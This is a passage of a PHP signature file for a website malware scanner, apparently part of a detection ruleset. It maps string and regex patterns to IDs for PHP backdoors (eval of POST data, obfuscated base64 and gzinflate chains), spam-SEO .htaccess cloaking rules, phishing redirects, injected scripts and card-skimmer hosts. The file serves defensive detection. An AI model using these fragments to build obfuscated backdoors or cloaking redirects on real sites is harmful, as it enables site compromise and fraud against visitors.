	'return;}}}document[' => array(STR_TRIGGER,
		'=decodeURI(' => array(STR_TRIGGER,
		),
	),

	'.lang(' => array(STR_WHITE,
		'weekdays:' => array(STR_WHITE,
			'\x2fportal' => array(STR_WHITE,
				'\x26media' => array(STR_WHITE,
					'\x26appInstanceName' => array(STR_WHITE,
						'\x2Ftemplates' => array(STR_WHITE,
							'\\\\x[a-zA-Z0-9]{2}[\w]{5,}\\\\x[a-zA-Z0-9]{2}[\w]{5,}\\\\x[a-zA-Z0-9]{2}[\w]{5,}' => array(REX_WARN, 'php.malware.obfuscated.022', NULL),
						),
					),
				),
			),
		),
	),

	'?main_page' => array(STR_TRIGGER,
	),

	'="setTimeout(' => array(STR_TRIGGER,
	),

	'require' => array(STR_TRIGGER,
		'require(_once)?[\s]*"(\.|\\\\x2e)(\/|\\\\x2f)(c|\\\\x63)(r|\\\\x72)(y|\\\\x79)(p|\\\\x70)(t|\\\\x74)(\.|\\\\x2e)(p|\\\\x70)(h|\\\\x68)(p|\\\\x70)";' => array(REX_WARN, 'rex.phishing.bank.002', NULL),
	),

	'vertDivider' => array(STR_WHITE,
		'\x72\x65\x70\x6c' => array(STR_WARN, 'php.malware.obfuscated.003.02', NULL,1),
	),

	'\x42\x4C\x4F\x47\x20\x53\x54\x41\x52\x54\x53\x20\x48\x45\x52\x45' => array(STR_WHITE,
		'\x61\x73\x73\x65\x72\x74' => array(STR_WARN,'php.malware.assert.008', NULL,1),
	),

	'"\\\\\\w+"\\."\\\\x\\w+"\\.' => array(REX_WARN, 'rex.hex_obfuscated.003', NULL),
	'return \\w\\w\\["[\\w\\d\\\\]+"]\\(\\w\\d\\);\\}function \\w\\w\\(\\)\\{return "[^;]{300,}";\\}' => array(REX_WARN, 'rex.js_injector.001', NULL),
	'\\$[\\w]+[\\s]*=[\\s]*[preglac\'"_\\.\\s]+;[\\s]*\\$[\\w]+[\\s]*=[\\s]*[\'"][^;]+[\'"]\\^[\'"][^;]+[\'"];[\\s]*\\$[\\w]+\\(\\$[\\w]+,[\\s]*[\'"][^;]+[\'"]\\^[\'"][^;]+[\'"]\\);' => array(REX_WARN, 'rex.preg_replace_hexcode.002', NULL),
	'\x68\x74\x74\x70\072\057' => array(STR_WARN, 'php.malware.http-enc.001', NULL,1),
	'\x62\141\x73\145\x36\64\x5f\144' => array(STR_WARN, 'php.malware.base64.002', NULL,1),
	'\x61\163\x65\66\64\137\144' => array(STR_WARN, 'php.malware.base64.002.06', NULL,1),
	'e6\x34\x5f' => array(STR_WARN, 'php.malware.base64.002.007', NULL,1),
	'\x6C\x28\x67\x7A' => array(STR_WARN, 'php.redirect.header_location.001', NULL,1),
	'\x63\x6e\x69\x66\x64\x72\x36\x6f' => array(STR_WARN, 'php.malware.create_function.001.03', NULL,1),
	'\x65r\x72\x6fr_r\x65\x70' => array(STR_WARN, 'php.malware.hex_oct_obfuscation.001', NULL,1),
	'\x43\x4f\x4f\x4b\x49' => array(STR_WARN, 'php.malware.obfuscated.001.03', NULL,1),
	'\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x6f\x6f\x2e\x67\x6c\x2f' => array(STR_WARN, 'html.malware.goo_gl.005', NULL,1),
	'$m = "\x6d\x645";' => array(STR_WARN, 'php.mailer.POST.003.02', NULL,1),
	'(create_function(\'\',"\x65' => array(STR_WARN, 'php.backdoor.generic.008', NULL,1),
	'"\x2f\x2e*/e"' => array(STR_WARN, 'php.malware.obfuscated.003', NULL,1),
	'"\x62as\145' => array(STR_WARN, 'php.backdoor.eval_gen.002.01', NULL,1),
	'.="\x65\x36\x34' => array(STR_WARN, 'php.backdoor.base64.005', NULL,1),
	'tion_exists(\'create_function\')){$' => array(STR_WARN, 'php.backdoor.create_function.002.02', NULL,1),
	'"\x68\x65a\144\x65\x72";' => array(STR_WARN, 'php.redirect.header_location.007', NULL,1),
	'$HASHWORD in OneFileCMS' => array(STR_WARN, 'php.hacktool.shell-uploader.003', NULL,1),
	'>PHP MySQL Bridge by <a href="http://emagicone.com' => array(STR_WARN, 'php.hacktool.dbshell_gen.001', NULL,1),
	'f\165\x6e\143ti\157n' => array(STR_WARN, 'php.backdoor.eval_gen.001.04', NULL,1),    
	'\x65\166\x61\154' => array(STR_WARN, 'php.malware.eval_gen.005', NULL,1),
	'\x62\141\x73\145\x36\64\137\144\x65' => array(STR_WARN, 'php.backdoor.base64.002', NULL,1),
	'\146\x69l\x65\x5fg\145\x74\x5f\x63' => array(STR_WARN, 'php.backdoor.file_get_contents.004', NULL,1),
	'_\x67\145t\137\x63' => array(STR_WARN, 'php.backdoor.file_get_contents.004.02', NULL,1),
	'\162\x65\141\x74\145\x5f\146\x75\156\x63' => array(STR_WARN, 'php.backdoor.create_function.007', NULL,1),
	'\145\x61\164\145\x5f\146\165\156\x63' => array(STR_WARN, 'php.backdoor.create_function.007.02', NULL,1),
	'\x40\145\x76\141\x6c' => array(STR_WARN, 'php.malware.generic.027.010', NULL,1),
	'="/\x2e\x2a/\x65";' => array(STR_WARN, 'php.backdoor.pregreplace.012.02', NULL,1),
	'"g\172\x69\156\x66l' => array(STR_WARN, 'php.backdoor.gzinflate.002', NULL,1),
	'"\147z\x69\x6' => array(STR_WARN, 'php.backdoor.gzinflate.003', NULL,1),
	'g\x7Ai\x6E' => array(STR_WARN, 'php.backdoor.gzinflate.004', NULL,1),
	'\x67\x7A\x69\x6E\x66' => array(STR_WARN, 'php.malware.gzinflate_hex.001', NULL,1),
	'[0]=array_pop($' => array(STR_CLEAR_LINEMATCH, 'php.malware.array_pop.001', 'global\s+\$\w+;[^;]+0\]=array_pop\(\$[^\{]+2\]=gzuncompress[^{]+=.create_.;if[^}]+str_repeat\(..x[^\n]+unset..\w+\);'),
	'ass\x65rt' => array(STR_WARN, 'php.malware.assert.007', NULL,1),
	'"\142as\145\x36' => array(STR_WARN, 'php.malware.base64.012', NULL,1),
	'"bas\x65\66' => array(STR_WARN, 'php.malware.base64.013', NULL,1),
	'echo @$GLOBALS$GLOBALS' => array(STR_WARN, 'php.malware.corrupted.002', NULL, 1),
	'if(isset($_POST["cod\x' => array(STR_WARN, 'php.backdoor.eval_REQUEST_gen.004', NULL, 1),
	'r64_qr' => array(STR_WARN, 'php.malware.base64.004', NULL, 1),
	'Lj1jaHIoJHZeJGspO2V2YWwoJHopOw==' => array(STR_CLEARFILE, 'php.backdoor.system_shell.003', NULL,1),
	'/* copyright */ $x0f="' => array(STR_WARN, 'php.redirect.header_location.002', NULL,1),
	'(\$\{.[^\}]+.x\w+[^}]+\}\[[^\]]+.x\w+[^\]]+\][^+;\\\]+?.x\w+[^;]++;\n?){8,}' => array(REX_WARN, 'rex.Global_HEX.001', NULL),
	'$x1b(\'~\d~\',$x0d,$x0e)' => array(STR_WARN, 'php.spam-seo.injector.025', NULL, 1),
	').\'*./\'),"@$_' => array(STR_WARN,'php.backdoor.generic.038', NULL,1),
	'x74\x70\x69\x72\x63\x73\x3C' => array(STR_WARN, 'js.malware.generic.026', NULL, 1),
),

'Rewrit' => array(STR_TRIGGER,

	'RewriteCo' => array(STR_TRIGGER,

		'RewriteCond %' => array(STR_TRIGGER,  
			'RewriteCond %{REQUEST_FILENAME} !-f' => array(STR_TRIGGER,
				'RewriteRule .* client.php [L,QSA]' => array(STR_WARN, 'htaccess.spam-seo.doorway-rewrite.008.02', NULL, 1),
			),
		),

		'&%{QUERY_STRING}[L]' => array(STR_TRIGGER,
			'RewriteRule ^.*-.*-.*_([0-9]+)_([0-9]+)' => array(STR_WARN, 'htaccess.spam-seo.doorway.003.09', NULL, 1),
			'SEMXW' => array(STR_WARN, 'htaccess.spam-seo.doorway.003.03', NULL, 1),
		),

		'RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]' => array(STR_TRIGGER, 
			 'RewriteRule ^(.*)$ http://' => array(STR_TRIGGER,
				'RewriteRule ^(.*)$ http://' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.001', NULL,1),
			),
		),

		'[NE,L,R=302]' => array(STR_TRIGGER, 
		),

		'RewriteRule ^' => array(STR_TRIGGER,
			'.php?site=$1&id=$3&temp=$2 [L]' => array(STR_WARN, 'htaccess.spam-seo.doorway.003.07', NULL, 1),
		),

		'>Add the following snippet of code' => array(STR_WHITE,
			"\t\t\t\t\t\t\t\t\t\tRewriteCond %" => array(STR_WARN, 'htaccess.malware.generic.005', NULL,1),
		),

		'allow from 200' => array(STR_TRIGGER,
			'<Limit GET HEAD POST>' => array(STR_WARN, 'htaccess.phishing.block_bots.002', NULL, 1),
		),

		'msnbot|Libwww-perl|FAST|Baidu' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.005', NULL,1),    
		'/common.php [L]' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.006', NULL,1),
		'"MSIE|Trident|iPhone|Presto"' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.016', NULL,1),
		'RewriteCond %{REMOTE_ADDR}      !^66\.249.' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.008', NULL,1),
		'!^.*nUN.*$ [NC]' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.009', NULL,1),
		'google|yahoo|msn|aol|ANTIPIDERSIA' => array(STR_WARN, 'htaccess.malware.generic.002', NULL,1),
		'RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.011', NULL,1),
		'RewriteCond %{REQUEST_URI} (ciali|viag|propec)' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.012', NULL,1),
		'RewriteCond %{HTTP_USER_AGENT} android [NC' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.013', NULL,1),
		'RewriteCond %{HTTP_USER_AGENT} "Android" [NC' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.013.02', NULL,1),
		'RewriteCond %{HTTP_USER_AGENT} "android" [NC' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.013.03', NULL,1),
		'RewriteCond %{HTTP_USER_AGENT} "Android|MSIE|Trident|Edge" [NC]' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.022', NULL,1),
		'RewriteCond %{HTTP_USER_AGENT} {google|bing|slurp|msn|yahoo|bot|crawler|spider' => array(STR_WARN, 'htaccess.malware.generic.006', NULL,1),
		'/wp-cache.php?p=$1 L' => array(STR_WARN, 'htaccess.malware.generic.007', NULL, 1),
		'/wp-stat\.php' => array(STR_WARN, 'htaccess.malware.generic.008', NULL, 1),
		'/wp-stat.php' => array(STR_WARN, 'htaccess.malware.generic.008.001', NULL, 1),
		'RewriteRule ^(.*)$ wp-' => array(STR_WARN, 'htaccess.malware.generic.008.002', NULL, 1),
		'/webdirect.php?link=$1' => array(STR_WARN, 'htaccess.malware.generic.009', NULL, 1),
		'RewriteCond %{REQUEST_URI} (viagra|cialis|levitra' => array(STR_WARN,'htaccess.spam-seo.redirect_gen.023', NULL,1),
		'deny from 173.194.' => array(STR_WARN, 'htaccess.phishing.block_bots.001', NULL, 1),
		'RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|Seznam|seznam)' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.027', NULL,1),
		'                                                                                      RewriteCond %' => array(STR_WARN, 'htaccess.malware.generic.005.02', NULL,1),
	),

	'RewriteRule' => array(STR_TRIGGER,
	
		'&%{QUERY_STRING}[L]' => array(STR_TRIGGER,
			'..*$ ?$' => array(STR_TRIGGER,
				')([0-9]+)..*$ ?$2$1=$3&%{QUERY_STRING}[L]' => array(STR_WARN, 'htaccess.spam-seo.doorway.003', NULL, 1),
				'RewriteRule ^([^\d\/]+)' => array(STR_WARN, 'htaccess.spam-seo.doorway.003.04', NULL, 1),
				'RewriteRule ^.*\/.*\/([^\d\/]+)' => array(STR_WARN, 'htaccess.spam-seo.doorway.003.05', NULL, 1),
			),
		),

		'RewriteCond %{QUERY_STRING} !^desktop' => array(STR_TRIGGER, 
			'RewriteRule ^$ http:' => array(STR_WARN,'htaccess.spam-seo.redirect_gen.026', NULL, 1),
		),
	
		'RewriteRule ^ugg-(.*).html$' => array(STR_TRIGGER,
		),
	
		'/wp-content/hostinger-page-cache/' => array(STR_WHITE,
			'# BEGIN WordPress[\s]*<IfModule mod_rewrite\.c>[\s]*[\s]*RewriteEngine On[\s]*RewriteBase .[\s]*RewriteRule \^(?!index\\\.php)' => array(REX_WARN, 'htaccess.spam-seo.wp-core.001', NULL),
		),

		'/index.php?cx=$1' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.015', NULL,1),
		'modules/system/system.php?$1 [L]' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.018', NULL,1),
		'/ms/$1\.php [L]' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.019', NULL,1),
		'.php?uu=$1-$2-$3 [L]' => array(STR_WARN,'htaccess.spam-seo.redirect_gen.020', NULL,1),
		'.php?p=$1-$2-$3-$4.html [L]' => array(STR_WARN, 'htaccess.spam-seo.doorway-rewrite.001', NULL, 1),
		'/mobiledirect/?aid=35509&uid=2477 [R=301,L]' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.021', NULL,1),
		'[\t]{30,}RewriteRule' => array(REX_WARN, 'htaccess.spam-seo.redirect_gen.039', NULL),
		'Options All -Indexes\s+RewriteEngine On\s+RewriteRule \^\(\.\*\)\$ http:\/\/[^\$\[ ]+ \[R=301,L\]' => array(REX_WARN, 'rex.unconditional-redirect.001', NULL),
		'RewriteRule [^\[]+? http:.\/(ow.ly|bit.ly|bitly.com|bit.do|goo.gl|is.gd|tinyurl.com)\/' => array(REX_WARN, 'rex.url_short_redirect.001', NULL),
		'RewriteRule ^(.*)$ 1.php' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.028', NULL, 1),
		'preg_match("/RewriteRule' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.029', NULL, 1),

	),

	'ryIndex cache.managed.php' => array(STR_TRIGGER,
		'RewriteEngine On' => array(STR_WARN, 'htaccess.spam-seo.cache_managed.001', NULL, 1),
	),

	'php?ximg=$1&ext=$2 [L]' => array(STR_WARN, 'htaccess.spam-seo.doorway.001', NULL, 1),
	'/([^\.]+) /modules/mod_' => array(STR_WARN, 'htaccess.spam-seo.doorway.004', NULL, 1),
	')\.html$ wp-content/' => array(STR_WARN, 'htaccess.spam-seo.suspicious-rewrite.001', NULL, 1),
),

'eval' => array(STR_TRIGGER,

	'base64_decode' => array(STR_TRIGGER,

		'JF9TRVJWRVJbJ0h' => array(STR_TRIGGER,
			'Z29vZ2xl' => array(STR_WARN, 'php.backdoor.base64.001.06', NULL, 1),
		),

		'( gzuncompress (' => array(STR_WARN, 'php.malware.gzuncompress.003', NULL, 1),
		'c2hlbGxfZXhlYyg' => array(STR_WARN, 'php.backdoor.base64.001.03', NULL, 1),
		'PSBzdHJfcmVwbGFjZSgi' => array(STR_WARN, 'php.backdoor.base64.001.05', NULL, 1),
	),

	'eval(function(p,a,c,k,e,d)' => array(STR_TRIGGER,

		'|mooo|' => array(STR_TRIGGER,
			'|google|' => array(STR_TRIGGER,
				'|bing|' => array(STR_TRIGGER,
				),
			),
		),

		'^(.*\/)?(?:wp-admin|wp-includes)\/' => array(REX_PATH_TRIGGER,
			'|userAgent' => array(STR_TRIGGER,
				'|clickund_expert|' => array(STR_WARN, 'js.malware.obfuscated_wp_core.002', NULL, 1),  
			),
		),

		'var|www|yahoo|yandex' => array(STR_WARN, 'js.spam-seo.redirect.005', NULL,1),
		'[^\w]eval\(\$_' => array(REX_WARN, 'php.backdoor.eval_POST.008.002', NULL),
		'|CoinHive|' => array(STR_WARN, 'js.malware.cryptominer.001.03', NULL, 1),
	),

	'gzinflate(base64_decode(' => array(STR_TRIGGER,

		'<strlen($' => array(STR_TRIGGER,
			'chr(ord($' => array(STR_TRIGGER,
				'gzinflate\(base64_decode\(\$[\w]+\)\);[\s]*for[\s]*\(\$[\w]+[\s]*=[\s]*0;[\s]*\$[\w]+[\s]*<strlen[^\{]+\{[\s]*\$[\w]+\[\$[\w]+\][\s]*=[\s]*chr\(ord\(\$[^;]+;[\s]*\}[\s]*return[^;]+;[\s]*\}[\s]*eval\(' => array(REX_WARN, 'php.malware.pack.004', NULL),
			),
		),

	),

	'www.xcartmods.co.uk */$' => array(STR_WHITE,
	),

	'eval($_POST[' => array(STR_TRIGGER,
		'if\(isset\(\$_POST\[[^\]]+\]\)\)[\s]*eval\(\$_POST\[' => array(REX_WARN, 'php.malware.eval_gen.007', NULL),
	),

	'eval(get_option(' => array(STR_WARN, 'php.backdoor.eval_get_option.001', NULL, 1),
	'Accept-Language: zh-cn' => array(STR_WARN, 'php.malware.cn_downloader.001', NULL, 1),
	'\';eval\(\$' => array(REX_WARN, 'rex.eval_var.002', NULL), 
	'window.document\)eval\(\w+.fromCharCode.apply\(\w+,\w+\)\);' => array(REX_WARN, 'rex.eval_blackhole.001', NULL),
	'(base64_decode..\w{3,}..\.){5,}[^;]+base64_decode..\w{1,}=[^;]+;\s*eval.\$\w+.;' => array(REX_WARN, 'rex.eval_multi_base64.001', NULL),
	'eval(strrev(' => array(STR_WARN, 'php.malware.strrev.002', NULL,1),
	'@eval(urldecode($_POST' => array(STR_WARN, 'php.backdoor.eval_POST.009', NULL,1),
	'));}}eval($' => array(STR_WARN, 'php.backdoor.nonascii.001', NULL,1),
	';@eval($' => array(STR_WARN, 'php.backdoor.generic.003.03', NULL,1),
	'eval("\145\166\141\154\050' => array(STR_WARN, 'php.backdoor.generic.001', NULL,1),
	');}eval($' => array(STR_WARN, 'php.backdoor.generic.001.16', NULL,1),
	'"ba"."se"."64_d"."ecode";eval($' => array(STR_WARN, 'php.backdoor.generic.001.21', NULL,1),
	';}};eval($QQQQQ(' => array(STR_WARN, 'php.backdoor.eval_gen.003', NULL,1),
	'eval/**/(' => array(STR_WARN, 'php.backdoor.eval_gen.006', NULL, 1),
	'<%eval request' => array(STR_WARN, 'php.backdoor.eval_REQUEST.002', NULL,1),
	'\']; eval($' => array(STR_WARN, 'php.backdoor.eval_REQUEST.003', NULL,1),
	'@eval(@eval' => array(STR_WARN, 'php.backdoor.generic.001.28', NULL,1),
	'<?php @error_reporting(0);@ini_set(\'display_errors\',false);' => array(STR_WARN, 'php.backdoor.generic.019', NULL,1),
	'6261736536345f6465636f6465' => array(STR_WARN,'php.malware.base64.022', NULL,1),
	'gougou|ifeng' => array(STR_WARN, 'js.spam-seo.redirect.010', NULL,1),
	'exec($_' => array(STR_WARN, 'php.backdoor.exec.001', NULL, 1),
	'substr(pack(\'H*\', sha1(' => array(STR_WARN, 'php.backdoor.eval_xor.001', NULL, 1),
	'exec(\'echo "./\' . basename($file) . \'" | /bin/sh' => array(STR_WARN, 'php.backdoor.system_shell.002', NULL, 1),
	'\'b\' . \'a\' . \'s\' . \'e\' . \'6\' . \'4\' .' => array(STR_WARN, 'php.malware.base64.005', NULL, 1),
	'"b" . "a" . "s" . "e" . "6" . "4"' => array(STR_WARN, 'php.malware.base64.008', NULL, 1),
	'ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpo' => array(STR_WARN, 'php.malware.base64.016', NULL, 1),
	'String.fromCharCode,isNaN,parseInt,String' => array(STR_WARN, 'js.malware.Donnazmi-encryptor.001', NULL, 1),
	'eval(bzdecompress(' => array(STR_WARN, 'php.backdoor.eval_gen.007', NULL, 1),
	'<\?(php)?[\s]*@eval\(\[' => array(REX_WARN, 'php.backdoor.eval_POST.039.02', NULL),
	'\@?[Gg][Zz][Ii][Nn][Ff][Ll][Aa][Tt][Ee]\(\@?[Ss][Tt][Rr]_[Rr][Oo][Tt]13\(\@?[Bb][Aa][Ss][Ee]64_[Dd][Ee][Cc][Oo][Dd][Ee]' => array(REX_WARN, 'php.backdoor.generic.001.18', NULL,1),
	']);if(isset(${$' => array(STR_WARN, 'php.backdoor.generic.001.22', NULL,1),
),

'<scrip' => array(STR_TRIGGER,  

	'document.write(' => array(STR_TRIGGER,

		'function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:' => array(STR_TRIGGER, //this is legit jQuery snippet
			'var Scriptaculous = {' => array(STR_WHITE, 
				'document.write(\'<script type="text/javascript" src="http' => array(STR_WARN, 'js.spam-seo.jQuery_injector.001', NULL,1), //this should not be present in jQuery
			),
		),
	
		' src=\\"ht"+"tp:\\/\\/' => array(STR_WARN, 'js.malware.injector.008', NULL,1),
		'%3C%69%66%72%61%6D%65%20%73%72%63%3D%22' => array(STR_WARN, 'js.malware.generic.005.001', NULL, 1),
		'<!-- HTML encodyd by PR-CY.ru -->' => array(STR_WARN, 'js.malware.generic.005', NULL, 1),
		'}xViewState();' => array(STR_WARN, 'php.spam-seo.xViewState.001',NULL,1),
		'%3C%21%44%4F%43%54%59%50%45%20' => array(STR_WARN, 'js.spam-seo.redirect_gen.001', NULL,1),
	),

	'").style.display=' => array(STR_TRIGGER,
		'</div><script>document.getElementById("' => array(STR_TRIGGER,
		),
	),

	'window.location = "http://' => array(STR_TRIGGER,
		'if (screen.width <= 480)' => array(STR_WARN, 'js.spam-seo.redirect_gen.003', NULL,1),
	),

	'if(isset($_SERVER[\'HTTP_REFERER\']) && (!isset($_COOKIE[' => array(STR_TRIGGER,
		'<ins class="adsbygoogle"' => array(STR_TRIGGER,
		),
	),

	'<!--\w\w\w\w\w\w--><script' => array(REX_TRIGGER,
	),

	'(){if(document[' => array(STR_TRIGGER, 
	),

	'clksite.com' => array(STR_TRIGGER,
	),

	'>";</script>' => array(STR_TRIGGER,
	),

	'<script>document.location="http' => array(STR_TRIGGER,
	),

	'<!-- . --><script' => array(STR_TRIGGER,
	),

	'<script[^>]+src[^>]+(bit.ly|bitly.com|bit.do|goo.gl|is.gd|tinyurl.com|g00.co|tr.im|cutt.ly)[^<]+<.script>' => array(REX_WARN, 'rex.url_short.002', NULL),
	'<script\s*(type|language)[^\s]+\s*src=.http:..\D+pop(up)?\.php\?u(ser)?=[0-9]+[^>]+><.script>' => array(REX_WARN, 'rex.popup_php.001', NULL), 
	'The requested URL /js/code/a_0.txt was not' => array(STR_WARN, 'php.spam-seo.suspicious_404.001', NULL, 1),
	'function PopShow3()' => array(STR_WARN, 'js.malware.PopShow3_popup.001', NULL, 1),
	'js.users.51.la' => array(STR_WARN, 'js.malware.51_la.001', NULL, 1),
	'print_r(\'<script ' => array(STR_WARN, 'php.malware.injector_gen.027', NULL, 1),
	'$jumpcode=\'<script type="text/javascript' => array(STR_WARN, 'js.spam-seo.redirect.006', NULL,1),
	'[group=4,5]<script ' => array(STR_WARN, 'php.malware.DLE_injection.001', NULL, 1),
	'<a href="" title="My &#12395;&#36861;&#21152;" target=' => array(STR_WARN, 'html.spam-seo.japanese-spam.007', NULL, 1),
	'kcxml/capitalone.com/secure.bankofamerica.com/myaccounts' => array(STR_WARN, 'html.phishing.bankofamerica.006', NULL, 1),
	'R14nDarkList' => array(STR_WARN, 'php.hacktool.generic.004', NULL,1),
	'document.getElementById(\'hideMe\')' => array(STR_WARN, 'js.spam-seo.hideMe.001', NULL, 1),
	'document.write(z);</script><div' => array(STR_WARN, 'js.spam-seo.hideMe.001.02', NULL, 1),    
	'}dnnViewState();' => array(STR_WARN, 'php.spam-seo.xViewState.002', NULL, 1),
	'document.write (\'<\' + \'/d\' + \'i\' + \'v>\');' => array(STR_WARN, 'php.spam-seo.hidden-div.004', NULL,1),
	'"Baiduspider,Sogou,baidu,Sosospider' => array(STR_WARN, 'asp.spam-seo.injector_gen.002', NULL,1),
	'//cdn.popcash.net/pop.js"></script>' => array(STR_WARN,'js.spam-seo.redirect_gen.002', NULL,1),
	'<script[^>]+src=.https?:..(?:goo\.gl|bit\.ly|adf\.ly)[^>]+><.script>' => array(REX_WARN, 'rex.js_injector.003', '<script[^>]+src=.https?:..(?:goo\.gl|bit\.ly|adf\.ly)[^>]+><.script>'),
),

'code' => array(STR_TRIGGER,

	'base64_decode' => array(STR_TRIGGER,

		'eval' => array(STR_TRIGGER,
			'eval (s(base64_decode(' => array(STR_WARN, 'php.backdoor.eval_xor.001.02', NULL,1),
			'=base64_decode($_POST[\'' => array(STR_WARN, 'php.backdoor.generic.043', NULL, 1),
		),

		'gzinflate' => array(STR_TRIGGER,
		),

		'wp_mail($email, $subject, base64_decode("aHR0c' => array(STR_TRIGGER,
			'@mail($email, $subject, base64_decode("aHR0c' => array(STR_TRIGGER,
			),
		),

		'exit( header(base64_decode(' => array(STR_WARN, 'php.redirect.header_location.004', NULL,1),
		'die(header(base64_decode(' => array(STR_WARN, 'php.redirect.header_location.005', NULL,1),
		'=base64_decode("P\x46N' => array(STR_WARN, 'php.redirect.js_window_location.001', NULL,1),
		'base64_decode(strrev' => array(STR_WARN, 'php.malware.strrev.002.02', NULL,1),
		'echo(stripslashes(base64_decode(' => array(STR_WARN, 'php.malware.base64.027', NULL, 1), 
		';return base64_decode($a[$i' => array(STR_WARN, 'php.hacktool.doorway-gen.001', NULL,1),
		'@$_(base64_decode(' => array(STR_WARN, 'php.backdoor.eval_POST.008.001', NULL,1),
		'base64_decode($_POST["msgsubject"]' => array(STR_WARN, 'php.mailer.POST.005', NULL,1),
		'echo file_get_contents(base64_decod' => array(STR_WARN, 'php.backdoor.file_get_contents.001', NULL,1),
		'base64_decode(str_rot13($' => array(STR_WARN, 'php.backdoor.generic.001.19', NULL,1),
		'create_function("", base64_decode' => array(STR_WARN, 'php.backdoor.create_function.004', NULL,1),
		'create_function(\'\', gzuncompress(base64_decode(' => array(STR_WARN, 'php.backdoor.create_function.005', NULL,1),
		'preg_match(\'/msie|trident/i\', $_SERVER[\'HTTP_USER_AGENT\']) && isset($_SERVER[\'HTTP_REFERER\'])' => array(STR_WARN, 'php.malware.msie_check.001', NULL,1),
		'file_put_contents($_SERVER[\'DOCUMENT_ROOT\'].base64_decode(' => array(STR_WARN, 'php.backdoor.backdoor_installer.002.02', NULL, 1),
		'preg_replace(base64_decode(base64_decode' => array(STR_WARN, 'php.backdoor.pregreplace.014', NULL,1),
		'PGlmcmFtZSBzcmM9Ig==' => array(STR_WARN, 'php.malware.encodediframe.001', NULL, 1),
		'echo  base64_decode("PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY' => array(STR_WARN, 'php.malware.base64.026', NULL, 1),
	),

	'naem' => array(STR_TRIGGER,
	),

	'#apachecodes' => array(STR_TRIGGER,
		 'RewriteCond %{HTTP_REFERER}' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.010', NULL,1),
	),

	'2).\'_de\'.\'code\'' => array(STR_WARN, 'php.malware.generic.040', NULL,1), 
	'sprintf((substr(urlencode(print_r' => array(STR_WARN, 'php.backdoor.array.001', NULL,1),
	'$pass=urldecode($_COOKIE[\'pa\'])' => array(STR_WARN, 'php.backdoor.system.003', NULL,1),
	'<\' + \'i\' + \'f\' + \'r\' + \'a\' + \'m\' +' => array(STR_WARN, 'js.malware.hidden-iframe.004', NULL, 1),
	'= \'pre\' . \'g_replace\';' => array(STR_WARN, 'php.backdoor.pregreplace.009', NULL, 1),
	'exit("document.write' => array(STR_WARN, 'php.malware.injector.009', NULL, 1),
	').\'eate_func' => array(STR_WARN, 'php.backdoor.create_function.010', NULL, 1),
),

'http' => array(STR_TRIGGER,

	'ocation' => array(STR_TRIGGER,

		'// Credit Card Validation Javascrip' => array(STR_TRIGGER,

			'http.open("POST"' => array(STR_TRIGGER,
			),

		),

		'<lastmod>' => array(STR_TRIGGER,
			'<loc>http' => array(STR_TRIGGER,
			),
		),

		'<SCRIPT LANGUAGE="JavaScript">' => array(STR_TRIGGER,
		),

		'window.top.location.href="http://doctor" + "' => array(STR_WARN, 'js.spam-seo.redirect.003', NULL,1),
		'<?php header("Location: http://com-' => array(STR_WARN, 'php.redirect.header_location.011', NULL, 1),
		'header(\'location:https://www.paypal.com\')' => array(STR_WARN, 'php.phishing.paypal.003', NULL, 1),
		'header(\'Location: http://goo.gl/' => array(STR_WARN, 'php.spam-seo.goo_gl_redirect.001', NULL, 1),
		'(?<=<\?php\n)header\([\'"][Ll]ocation:\s*https?:[^\)]+\)\s*;\s*exit\s*;(?=\s\?>)' => array(REX_WARN, 'php.spam-seo.header_location.029', NULL),
	),

	'buy-cheap' => array(STR_TRIGGER,
		'Referer Spam Blocker' => array(STR_WHITE,
		),
	),

	'<Files *.php>' => array(STR_TRIGGER,
		'SecFilterEngine Off' => array(STR_TRIGGER,
		),
	),

	'copy(\'https://getcomposer.org' => array(STR_WHITE,
		'[\s]copy\(.http' => array(REX_WARN, 'php.malware.copy.001', NULL),
	),

	'<!-- saved from url=(' => array(STR_TRIGGER,
		'<!-- saved from url=\(\d+\)https?:\/\/[\w\.]*(?:outlook|youtube|gmail|yahoo|hotmail|card)\.com\/' => array(REX_WARN, 'rex.phishing.saved_from_url.001', NULL),
	),

	'Redirect 302 /betonmarkets http' => array(STR_WARN, 'htaccess.spam-seo.redirect_gen.014', NULL,1),
	'http://js.users.51.la/' => array(STR_WARN, 'php.spam-seo.injector_gen.024', NULL,1),
	'http://88.198.28.38/api.php' => array(STR_WARN, 'php.dropper.hosts.001.02', NULL,1),
	'http://host.deb-x.org' => array(STR_WARN, 'php.hacktool.host-deb-x-org.001', NULL,1),
	'fread_url("http' => array(STR_WARN, 'php.malware.generic.051', NULL,1),
	'$url = \'http://magentoupdateservices.com' => array(STR_WARN, 'php.malware.magento-cc-stealer.003', NULL,1),
	'http:\u002f\u002f' => array(STR_WARN, 'js.malware.injector.006', NULL,1),
	'Website: http://www.phpjm.net/' => array(STR_WARN, 'php.malware.phpjm_encode.001', NULL, 1),
